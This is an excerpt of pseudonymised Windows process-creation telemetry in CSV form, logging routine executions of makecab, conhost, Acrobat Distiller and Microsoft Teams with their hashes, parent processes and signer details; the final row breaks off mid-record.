+1107,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:13.593480+00:00,19864,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_927ea6650cee87fad86bae0514df4e9d8310861e.log C:\Windows\Logs\CBS\CbsPersist_20210623021638.cab",PortableExecutable,2019-12-07 09:08:46.175635700+00:00,C:\Windows\System32\makecab.exe,86528,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:13.981022400+00:00,2021-06-24 01:03:58.391323+00:00,de3e3f42-1b1d-4acd-b77d-d7a0e05d93c0,computerpii_0a470890c60768167990033d701e7bd881398861,170015,False,10.7740.19041.1052,False,11540474045175324,,11540474045175486,2021-06-24 00:54:25.737133100+00:00,11908,2021-06-24 00:54:25.737133100+00:00,TiWorker.exe,11908,18688,ActiveProcessStartkey,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb,239432,2026-12-16 19:42:14+00:00,2021-05-11 05:04:17.383161500+00:00,2021-06-24 00:54:25.771043700+00:00,2021-06-09 01:15:48.791212900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker
+1108,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:13.599097400+00:00,15284,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:13.593480+00:00,19864,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_927ea6650cee87fad86bae0514df4e9d8310861e.log C:\Windows\Logs\CBS\CbsPersist_20210623021638.cab",True,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:13.981390400+00:00,2021-06-24 01:03:58.391401300+00:00,07f0d20a-df91-467c-85a7-937dc6eb62bd,computerpii_0a470890c60768167990033d701e7bd881398861,170016,False,10.7740.19041.1052,False,11540474045175486,,11540474045175487,2021-06-24 01:02:13.593480+00:00,19864,2021-06-24 01:02:13.593480+00:00,makecab.exe,19864,18688,TerminateProcessStartkey,C:\Windows\System32,86528,2034-01-29 18:58:12+00:00,2019-12-07 09:08:46.175635700+00:00,2021-06-24 01:02:13.751526200+00:00,2019-12-07 09:08:46.175635700+00:00,18688,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1109,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:14.625100300+00:00,3616,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_94cbddab71e73299a5dbc27b89d3aca443b7182b.log C:\Windows\Logs\CBS\CbsPersist_20210623093107.cab",PortableExecutable,2019-12-07 09:08:46.175635700+00:00,C:\Windows\System32\makecab.exe,86528,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:14.812016400+00:00,2021-06-24 01:03:58.391829600+00:00,6e2f9e0e-e8c8-407b-a150-13b4a53fe987,computerpii_0a470890c60768167990033d701e7bd881398861,170022,False,10.7740.19041.1052,False,11540474045175324,,11540474045175488,2021-06-24 00:54:25.737133100+00:00,11908,2021-06-24 00:54:25.737133100+00:00,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,11908,16512,ActiveProcessStartkey,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb,239432,2026-12-16 19:42:14+00:00,2021-05-11 05:04:17.383161500+00:00,2021-06-24 00:54:25.771043700+00:00,2021-06-09 01:15:48.791212900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker
+1110,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:14.630204300+00:00,20572,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:14.625100300+00:00,3616,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_94cbddab71e73299a5dbc27b89d3aca443b7182b.log C:\Windows\Logs\CBS\CbsPersist_20210623093107.cab",True,2021-06-24 00:54:25.737133100+00:00,11908,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:14.812323400+00:00,2021-06-24 01:03:58.391903900+00:00,dc30ba9f-6c80-4230-947d-78f5f1c9ea3e,computerpii_0a470890c60768167990033d701e7bd881398861,170023,False,10.7740.19041.1052,False,11540474045175488,,11540474045175489,2021-06-24 01:02:14.625100300+00:00,3616,2021-06-24 01:02:14.625100300+00:00,\Device\HarddiskVolume3\Windows\System32\makecab.exe,3616,16512,ActiveProcessStartkey,C:\Windows\System32,86528,2034-01-29 18:58:12+00:00,2019-12-07 09:08:46.175635700+00:00,2021-06-24 01:02:09.745850200+00:00,2019-12-07 09:08:46.175635700+00:00,16512,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1111,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:42.514173800+00:00,20552,acrodist.exe,   /N /P --UseSystemFonts /Q:15,PortableExecutable,2021-02-02 05:49:32+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrodist.exe,491176,4fc2f2ee7279abdab8b4d236b1e3091c,f3e53f8221efdded9ed2488d812bd89d90210c985353e11368525ec56a7b22c0,faa792084fbce5ffb19744df6dbda4fc341aecc5,73d9fdd6ba9f5634ce8ab8b1f54abbd9,ee19864aa66a2dee5fcefa1f298498d8244b021294f2000a6e702b9e17ebddc1,20002f924780ab3595dd8c307e785ad429b4512c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:41.997705100+00:00,16580,acrotray.exe,"""acrotray.exe"" ",False,2021-06-24 00:52:40.992619+00:00,14292,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:42.606102+00:00,2021-06-24 01:03:58.397950900+00:00,c2cd21e9-3347-4026-bb9f-309099dd75fa,computerpii_0a470890c60768167990033d701e7bd881398861,170103,False,10.7740.19041.1052,False,11540474045175234,,11540474045175495,2021-06-24 00:52:41.997705100+00:00,16580,2021-06-24 00:52:41.997705100+00:00,acrotray.exe,16580,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5296352,2021-05-28 02:46:51+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:52:42.009038800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Inc.,AcroTray - Adobe Acrobat Distiller helper application.,21.5.20048.436468,AcroTray,AcroTray.exe,AcroTray,Adobe Systems Incorporated.,Acrobat  Distiller for Windows,21.1.20135.421056,Acrobat Distiller,acrodist.exe,Acrobat  Distiller
+1112,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:48.322508200+00:00,5512,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:49.319492700+00:00,2021-06-24 01:03:58.398101400+00:00,74c23af4-1aa0-4f2c-9a0d-fb1ecf1abe18,computerpii_0a470890c60768167990033d701e7bd881398861,170105,False,10.7740.19041.1052,False,11540474045175219,,11540474045175496,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1113,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:00:21.676431+00:00,17528,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_YjZiYWI4ZGUtZjRhYS00ZDQ1LWEzMzMtZjhlMWM1NTNmMjI5%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:00:22.094545100+00:00,2021-06-24 08:00:55.384202+00:00,750fbd08-d7a3-471d-a04e-65b69774802f,computerpii_0a470890c60768167990033d701e7bd881398861,177435,False,10.7740.19041.1052,False,11540474045175171,,11540474045177239,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16216,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1114,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:00:22.475674500+00:00,11396,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1680,6529324900301035260,9637905649252666795,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1728 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 08:00:21.676431+00:00,17528,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_YjZiYWI4ZGUtZjRhYS00ZDQ1LWEzMzMtZjhlMWM1NTNmMjI5%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-24 00:52:21.981443600+00:00,16216,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:00:22.501205+00:00,2021-06-24 08:00:55.384347600+00:00,aa41e289-b849-4c92-8859-4ef7576ae491,computerpii_0a470890c60768167990033d701e7bd881398861,177437,False,10.7740.19041.1052,False,11540474045177239,,11540474045177241,2021-06-24 08:00:21.676431+00:00,17528,2021-06-24 08:00:21.676431+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,17528,18560,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1115,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:00:23.174071400+00:00,19056,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1676,13461907958778593047,11591028799495173239,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1700 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 08:00:22.085840600+00:00,13860,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_YjZiYWI4ZGUtZjRhYS00ZDQ1LWEzMzMtZjhlMWM1NTNmMjI5%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-24 00:52:21.981443600+00:00,16216,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:00:23.201477100+00:00,2021-06-24 08:00:55.384412200+00:00,e37b2a4f-147c-415c-af1e-83246bf51d57,computerpii_0a470890c60768167990033d701e7bd881398861,177438,False,10.7740.19041.1052,False,11540474045177240,,11540474045177242,2021-06-24 08:00:22.085840600+00:00,13860,2021-06-24 08:00:22.085840600+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,13860,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1116,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:09:19.573272+00:00,11020,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:09:20.576136700+00:00,2021-06-23 